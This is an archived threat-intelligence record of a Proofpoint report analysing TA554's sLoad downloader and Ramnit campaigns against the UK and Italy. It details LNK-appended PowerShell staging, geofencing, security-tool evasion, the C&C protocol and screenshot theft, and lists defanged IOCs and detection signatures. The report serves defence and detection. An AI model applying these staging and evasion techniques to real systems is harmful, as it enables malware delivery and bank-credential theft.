{
	"id": "9a05a49d-a590-4eac-ab39-748cfdf7c8c2",
	"created_at": "2026-04-06T00:09:54.263899Z",
	"updated_at": "2026-04-10T03:36:00.155539Z",
	"deleted_at": null,
	"sha1_hash": "f1b0a2520a977d3871141cd99e3ffd9d3c5f341d",
	"title": "sLoad and Ramnit pairing in sustained campaigns against UK and Italy | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1657101,
	"plain_text": "sLoad and Ramnit pairing in sustained campaigns against UK and Italy\r\n| Proofpoint US\r\nBy October 23, 2018 Proofpoint Staff\r\nPublished: 2018-10-23 · Archived: 2026-04-05 14:58:35 UTC\r\nEditor's note: This post has been updated to reflect a change in TTPs for the actor that occurred after the original blog\r\nwas finalized.\r\nOverview\r\nSince May 2018, Proofpoint researchers have observed email campaigns using a new downloader called sLoad. sLoad is a\r\nPowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features.\r\nThe malware gathers information about the infected system including a list of running processes, the presence of Outlook,\r\nand the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains\r\n(e.g., targeted banks), as well as load external binaries. In this post we will:\r\nIntroduce sLoad\r\nDescribe sLoad campaigns by an actor with long history of activity, including the personalization of email\r\nmessages with the recipient's name and address\r\nCover geographic targeting of the UK, Italy, and Canada, particularly via geofencing, which is performed at\r\nmultiple points in the infection chain.\r\nDelivery\r\nWhile initial versions of sLoad appeared in May 2018, we began tracking the campaigns from this actor (internally named\r\nTA554) since at least the beginning of 2017. Other researchers also noticed some of these campaigns [2][3][4]. The\r\nfollowing figure shows a snapshot of the actor’s recent activity, starting slightly before the introduction of sLoad.\r\nhttps://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy\r\nPage 1 of 15\n\nFigure 1: Snapshot of TA554’s recent activity\r\nHistorically, this actor has targeted Italy, Canada, and the United Kingdom, specifically sending malicious emails to\r\nrecipients in these countries. The emails are crafted in the targeted country’s language and are often personalized to\r\ninclude recipients’ names and addresses in various parts of the email such as email body and subject. TA554 frequently\r\nuses package delivery or order notification lures; the emails contain URLs linking to zipped LNK files or zipped\r\ndocuments. The LNK file or document macros in turn download the next stage -- typically a PowerShell script which may\r\ndownload the final payload or another downloader such as sLoad.\r\nhttps://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy\r\nPage 2 of 15\n\nFigure 2: Email targeting Italian recipients on October 14, 2018\r\nFigure 3: Email targeting United Kingdom recipients on October 11, 2018. This email was personalized to include the\r\nrecipient’s name and address\r\nThe actor frequently, but not always, uses one or more intermediate downloader, such as an as yet unnamed PowerShell\r\nscript, sLoad, Snatch, or Godzilla. We have observed final payloads including Ramnit, Gootkit, DarkVNC, Ursnif, and\r\nPsiXBot.\r\nhttps://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy\r\nPage 3 of 15\n\nGeofencing -- restricting access to content based on the user’s location, determined via the source IP address -- is\r\nperformed at all steps of  the infection chain. For example, we observed checks being performed at:\r\n1. Download of the zipped-LNK\r\n2. LNK downloading PowerShell\r\n3. PowerShell downloading sLoad\r\n4. sLoad communications with its command and control (C\u0026C)\r\n5. sLoad receiving a task/command (base64-encoded binary)\r\nSteps 2 and 5 are additionally “Headers-fenced”, meaning that the request must also match those of BITS (Background\r\nIntelligent Transfer Service).\r\nMalware Analysis\r\nOverview\r\nFigure 4 shows an overview of the network traffic in this infection chain.\r\nFigure 4: The full infection chain on October 17, starting from the user’s click on a link in a malicious email, to the\r\ndownload of PowerShell and sLoad, to subsequent sLoad C\u0026C traffic\r\nThe main elements of the infection chain are detailed below:\r\nLine 1: the initial user click on the URL in email, resulting in the download of a zipped LNK (a Windows shortcut\r\nfile [5]) from invasivespecies[.]us\r\nLine 3: the LNK, which was run by the user, downloads the next stage (PowerShell) from hotline[.]com/otki2/kine\r\nLine 5: PowerShell downloads sLoad (from lookper[.]eu/userfiles/p2.txt)\r\nLine 7: PowerShell downloads a file containing sLoad C\u0026C hosts (from lookper[.]eu/userfiles/h2.txt)\r\nLine 8-9: sLoad initial beacon\r\nLine 10-11: sLoad reporting infected system information and polling for commands\r\nLine 13: sLoad downloading Ramnit, after receiving a command to do so. Note that we have observed extended\r\nwaits -- more than one day -- until sLoad receives a command to download the next stage\r\nLine 14: sLoad sending screenshots to the C\u0026C\r\nhttps://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy\r\nPage 4 of 15\n\nLNK\r\nTypically when we see LNK files used as the first-stage downloader, they tend to point to a PowerShell command that\r\nperforms the download, all inside the link target field. With files like this, it is easy to extract and analyze the PowerShell\r\ncommand. For example, on Windows this can be performed manually by right-clicking on the shortcut file, selecting\r\nProperties, and analyzing the command in the “Target:” box.\r\nLess commonly, data can be appended to the end of a LNK file after the termination block (four NULL bytes) [7] as\r\nWindows will stop reading data in the LNK after seeing a termination block. So it is possible to add [malicious] data to the\r\nend of the file which can be parsed externally using PowerShell / Certutil / external tools to execute code. We have\r\nobserved this used to hide long series’ of commands such as described in [6].\r\nIn our case, the additional commands are appended after the end of the LNK file. Hence, the link target field essentially\r\ncontains a short “carving script” that finds and executes commands located after the end of the LNK file. The actual LNK\r\nis 1528 bytes long and additional 1486 bytes of PowerShell code is added at the end.\r\nFigure 5: Screenshot of the example LNK properties\r\nThe “Target:” field contains an obfuscated command that uses the “findstr” (“nwfxdrtsdnif” reversed), a Windows grep-like command, to find the malicious code appended at the end of the LNK file, which is marked with the “mrekikaso”\r\nstring.\r\nhttps://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy\r\nPage 5 of 15\n\nFigure 6: This screenshot shows the PowerShell code appended after the end of the LNK. This code performs the\r\ndownload of the next stage (more PowerShell)\r\nsLoad Downloader\r\nThe LNK downloads a small PowerShell script (unnamed) which itself contains a few notable features:\r\nIt performs a check to see if any security processes are running on the system and exits if found\r\nDownloads sLoad (e.g., from lookper[.]eu/userfiles/p2.txt) and stores it encrypted with a hardcoded key as\r\n“config.ini”\r\nDownloads sLoad C\u0026C hosts file (e.g. from lookper[.]eu/userfiles/h2.txt) and stores it encrypted with a hardcoded\r\nkey as “web.ini”\r\nUses a Scheduled Task to execute sLoad\r\nFigure 7: PowerShell (sLoad downloader) searching for security tools prior to performing any further action\r\nsLoad\r\nsLoad is also written in PowerShell. At the time of this writing, the latest version of sLoad was 5.07b, which we will\r\nanalyze here. It includes noteworthy features such as:\r\nCollection of information to report to the C\u0026C server that includes:\r\nA list of running process\r\nhttps://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy\r\nPage 6 of 15\n\nPresence of .ICA files on the system (likely Citrix-related)\r\nWhether an Outlook folder is present on the system\r\nAdditional reconnaissance data\r\nThe ability to take screenshots\r\nChecking the DNS cache for specific domains (e.g., targeted banks)\r\nLoading external binaries\r\nsLoad’s network communication begins with an initial C\u0026C beacon to path “/img.php?ch=1”, which is an empty request.\r\nIt may receive an “sok” from the server.\r\nAfter the initial beacon, sLoad enters a loop in which it pushes extensive information about the victim’s system to the\r\nC\u0026C, expects and executes commands from the server, and sends screenshots to the server. In this loop, it first performs a\r\nrequest to “captcha.php” and sends information about the infected system via the URL parameters.\r\nTable 1: Breakdown of URL parameters and values in the “captcha.php” request\r\nParameter Example Value Explanation\r\ng “pu” Hardcoded value\r\nc “0”\r\nIf any files with .ICA extension are found on the system, searched\r\nstarting from the “C:\\users” folder, this value is “1”. Otherwise\r\nthis value is “0”. We assume .ICA files are the most likely Citrix-related.\r\nid\r\nSystem’s UUID generated with: (Get-WmiObject\r\nWin32_ComputerSystemProduct).UUID\r\nv “Microsoft Windows 7 Ultimate”\r\nOS caption generated with: (gwmi\r\nwin32_operatingsystem).caption\r\nc “GLklWOaPjmVuQiCD”\r\nRandom string of 16 upper and lower letters, generated for each\r\nsuch request\r\na “*armsvc*cmd*cmd*conhost” “*”-separated list of running processes\r\nd\r\nThe point of this parameter is to count the number of computers\r\nin the current domain or network. This parameter could be empty\r\nif there are none, or can have a value such as “{in network:1}”\r\nhttps://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy\r\nPage 7 of 15\n\nn “MARK-PC” Computer name generated with: $env:ComputerName\r\nbu “*nwolb.com*barclays.co.uk”\r\n“*”-separated list of hostnames from the system’s DNS cache that\r\nmatch the hostnames from a hardcoded list of targeted banks\r\ncpu\r\n“Intel(R) Core(TM) i5-780HQ\r\nCPU @ 2.91GHz”\r\nSystem processor information\r\no “0”\r\nIf \"\\..\\Microsoft\\Outlook\\\" (starting from current working\r\ndirectory) exists then “1”, else “0”\r\nsLoad reads and saves the server’s response to the “captcha.php” request. If any response is returned, sLoad checks it and\r\nacts upon it. The response can begin with:\r\nTable 2: Explanation of possible responses from the C\u0026C to the “captcha.php” request\r\nServer Response\r\n(begins with)\r\nExplanation\r\n“run=” This is followed by a URL which is downloaded and its PowerShell content executed\r\n“updateps=”\r\nThis is followed by a URL which is downloaded and its PowerShell content saved.\r\nEssentially this implements the “update self” functionality. The contents of the file storing\r\nsLoad on disk are replaced, and the current sLoad instance is stopped\r\nAny other response\r\nwith length greater than\r\n3\r\nIs expected to be a URL, whose content is downloaded, decoded with “certutil”, and saved\r\nas an executable, at which point the executable is started\r\nNear the end of the main loop, sLoad will upload the screenshots it took of the victim’s Desktop to the “p.php” URI.\r\nsLoad executes a long sleep of 10 minutes before it polls the server again for commands and to upload additional\r\nscreenshots.\r\nhttps://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy\r\nPage 8 of 15\n\nFigure 8: sLoad posting a screenshot to its C\u0026C\r\nFigure 9: sLoad contains a hardcoded array of banking keywords and hostnames (in this instance, for Italian banks). It\r\ncompares the infected machine’s DNS cache to this list, and reports any matches to the C\u0026C in the “bu” parameter.\r\nFigure 10: sLoad contains a hardcoded array of banking keywords and hostnames (in this instance for UK banks). It\r\ncompares the infected machines DNS cache to this list, and reports any matches to the C\u0026C in the “bu” parameter.\r\nFigure 11: sLoad searching for files with .ICA extension, starting in “C:\\users” folder. We assume these are most likely\r\nCitrix-related due to this format used for Citrix application servers as a configuration file and the “$cit” variable.\r\nhttps://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy\r\nPage 9 of 15\n\nsLoad Versions\r\nSince May 2018 we have observed multiple versions of sLoad, which introduced incremental changes.\r\nTable 3: sLoad versions observed\r\nVersion Date Observed\r\n0.01b 2018-05-01\r\n2.01b 2018-05-09\r\n2.11b 2018-05-12\r\n2.37b 2018-06-06\r\n3.47b 2018-06-26\r\n4.07b 2018-08-23\r\n5.07b 2018-09-20\r\n5.08b 2018-10-03\r\nWe were also able to observe control panels for a number of these versions (Figures 12-15).\r\nhttps://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy\r\nPage 10 of 15\n\nFigure 12: Screenshot of the C\u0026C panel, version 0.01b\r\nFigure 13: Screenshot of the C\u0026C panel, version 2.01b\r\nhttps://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy\r\nPage 11 of 15\n\nFigure 14: Screenshot of the C\u0026C panel, version 2.37b\r\nFigure 15: Screenshot of the C\u0026C panel, version 4.07b\r\nUpdated October 23, 2018 - New TTP\r\nOn October 22, 2018, the actor added a victim facing landing at the zipped-lnk download step [8] (Figure 16). In this case,\r\nthe .LNK was downloading sLoad directly without the additional intermediate PowerShell.\r\nhttps://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy\r\nPage 12 of 15\n\nFigure 16: New victim-facing landing page \r\nConclusion\r\nProofpoint researchers identified yet another stealthy downloader, this time paired with personalized email lures and\r\nsophisticated geofencing. sLoad, like other downloaders we have profiled recently, fingerprints infected systems, allowing\r\nthreat actors to better choose targets of interest for the payloads of their choice. In this case, that final payload is generally\r\na banking Trojan via which the actors can not only steal additional data but perform man-in-the-browser attacks on\r\ninfected individuals. Downloaders, though, like sLoad, Marap, and others, provide high degrees of flexibility to threat\r\nactors, whether avoiding vendor sandboxes, delivering ransomware to a system that appears mission critical, or delivering\r\na banking Trojan to systems with the most likely return.\r\nReferences\r\n[1] https://asert.arbornetworks.com/snatchloader-reloaded/\r\n[2] https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/\r\n[3] https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/\r\n[4] http://blog.dynamoo.com/2017/02/highly-personalised-malspam-making.html\r\n[5] https://msdn.microsoft.com/en-us/library/dd871305.aspx\r\n[6] https://www.uperesia.com/booby-trapped-shortcut-generator\r\n[7] https://lifeinhex.com/analyzing-malicious-lnk-file/\r\nhttps://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy\r\nPage 13 of 15\n\n[8] https://twitter.com/ps66uk/status/1054706165878321152\r\nIndicators of Compromise (IOCs)\r\nIOC IOC Type Description\r\nhxxps://invasivespecies[.]us/htmlTicket-access/ticket-T559658356711702 URL\r\nURL in email - 2018-\r\n10-17\r\nhxxps://davidharvill[.]org/htmlTicket-access/ticket-V081650502356 URL\r\nURL in email - 2018-\r\n10-17\r\nhxxps://schwerdt[.]org/htmlTicket-access/ticket-823624156690858 URL\r\nURL in email - 2018-\r\n10-17\r\n5ea968cdefd2faabb3b4380a3ff7cb9ad21e03277bcd327d85eb87aaeecda282 SHA256\r\nticket-T559658356711702.zip\r\n- 2018-10-17\r\nhxxps://hotkine[.]com/otki2/kine URL\r\nZipped LNK gets\r\nPowerShell - 2018-10-\r\n17\r\na446afb6df85ad7819b90026849a72de495f2beed1da7dcd55c09cd33669d416 SHA256 kine - ps1 - 2018-10-17\r\nhxxps://lookper[.]eu/userfiles/p2.txt URL\r\nPowerShell gets sLoad\r\n- 2018-10-17\r\nhxxps://lookper[.]eu/userfiles/h2.txt URL\r\nPowerShell gets sLoad\r\nhosts file - 2018-10-17\r\n79233b83115161065e51c6630634213644f97008c4da28673e7159d1b4f50dc2 SHA256\r\np2.txt sLoad - GBR -\r\n2018-10-17\r\n245c12a6d3d43420883a688f7e68e7164b3dda16d6b7979b1794cafd58a34d6d SHA256\r\nh2.txt sLoad hosts -\r\nGBR - 2018-10-17\r\nhttps://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy\r\nPage 14 of 15\n\nhxxps://maleass[.]eu/images//img.php?ch=1 URL\r\nsLoad C\u0026C - 2018-10-\r\n17\r\nhxxps://informanetwork[.]com/update/thrthh.txt URL\r\nsLoad payload\r\n(Ramnit) - 2018-10-17\r\nb1032db65464a1c5a18714ce3541fca3c82d0a47fb2e01c31d7d4c3d5ed60040 SHA256 Ramnit - 2018-10-17\r\nxohrikvjhiu[.]eu|185.197.75.35 DOMAIN|IP\r\nRamnit C\u0026C - 2018-\r\n10-17\r\nET and ETPRO Suricata/Snort Signatures\r\n2830633 || ETPRO TROJAN sLoad CnC Checkin M2\r\n2830632 || ETPRO TROJAN sLoad CnC Checkin\r\n2018856 || ET TROJAN Windows executable base64 encoded\r\nSource: https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy\r\nhttps://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy"
	],
	"report_names": [
		"sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy"
	],
	"threat_actors": [
		{
			"id": "a3808e4f-c7fd-4d25-aa84-aacc27061826",
			"created_at": "2023-01-06T13:46:39.316216Z",
			"updated_at": "2026-04-10T02:00:03.285437Z",
			"deleted_at": null,
			"main_name": "TA554",
			"aliases": [
				"TH-163"
			],
			"source_name": "MISPGALAXY:TA554",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9be98f84-4a93-41c7-90bd-3ea66ba5bfd7",
			"created_at": "2022-10-25T16:07:24.581954Z",
			"updated_at": "2026-04-10T02:00:05.040995Z",
			"deleted_at": null,
			"main_name": "TA554",
			"aliases": [
				"TH-163"
			],
			"source_name": "ETDA:TA554",
			"tools": [
				"DarkVNC",
				"Godzilla",
				"Godzilla Loader",
				"Gootkit",
				"Gootloader",
				"Gozi ISFB",
				"ISFB",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Nimnul",
				"Pandemyia",
				"PsiX",
				"PsiXBot",
				"Ramnit",
				"StarsLord",
				"Waldek",
				"Xswkit",
				"sLoad",
				"talalpek"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434194,
	"ts_updated_at": 1775792160,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f1b0a2520a977d3871141cd99e3ffd9d3c5f341d.pdf",
		"text": "https://archive.orkl.eu/f1b0a2520a977d3871141cd99e3ffd9d3c5f341d.txt",
		"img": "https://archive.orkl.eu/f1b0a2520a977d3871141cd99e3ffd9d3c5f341d.jpg"
	}
}